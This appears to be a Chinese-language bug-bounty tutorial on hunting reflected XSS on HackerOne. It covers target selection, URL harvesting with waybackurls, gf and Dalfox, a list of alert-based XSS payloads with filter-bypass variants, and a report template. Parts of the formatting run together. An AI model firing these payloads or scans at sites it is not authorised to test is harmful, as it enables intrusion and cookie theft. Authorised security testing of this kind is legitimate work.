# 如何在HackerOne挖反射型XSS漏洞
## 前言
反射型XSS(Cross-Site Scripting)是最常見的Web安全漏洞之一,也是HackerOne平臺上高回報的漏洞類型。本文將系統講解反射型XSS的挖掘方法論、測試工具鏈和HackerOne實戰技巧。
---
## 一、理解反射型XSS
### 1.1 基本概念
反射型XSS是指惡意腳本通過URL參數注入,經服務器反射后直接在受害者瀏覽器執行的攻擊方式。典型特征:
- 輸入通過GET/POST參數傳遞
- 輸出未經過濾直接返回HTML
- 需要誘導用戶點擊惡意鏈接
### 1.2 危害場景
- 竊取用戶Cookie
- 劫持用戶會話
- 傳播惡意軟件
- 配合CSRF進行組合攻擊
---
## 二、目標識別策略
### 2.1 目標篩選技巧
在HackerOne上優先選擇:
- 有Web應用的科技公司(特別是SaaS服務)
- 漏洞披露歷史中有XSS記錄的項目
- 新上線功能/邊緣功能(如客服系統、搜索框)
### 2.2 參數收集方法
使用自動化工具收集測試面:
```bash
# 使用waybackurls收集歷史URL
cat domains.txt | waybackurls | grep "=" > urls.txt
# 使用GF模式匹配
cat urls.txt | gf xss | qsreplace '"><svg/onload=alert(1)>'
"><script>alert(1)</script>
'><img src=x onerror=alert(1)>
javascript:alert(document.domain)
根據輸出位置調整payload:
<!-- HTML屬性內 -->
" autofocus onfocus=alert(1) x="
<!-- JavaScript上下文中 -->
';alert(1);//
%3Cscript%3Ealert(1)%3C/script%3E<ScRipT>alert(1)</sCRipT><script>alert(1)</script># XSS Hunter(用于盲檢測)
https://xsshunter.com/
# Dalfox
cat urls.txt | dalfox pipe --skip-bav
**Title**: Reflected XSS in [parameter] via [vector]
**Steps to Reproduce**:
1. Visit https://example.com/search?q=<svg/onload=alert(1)>
2. Observe JavaScript execution
**Impact**: Cookie theft + session hijacking
# 利用hashchange事件
<iframe src="https://vuln.com/#<img src=x onerror=alert(1)>">
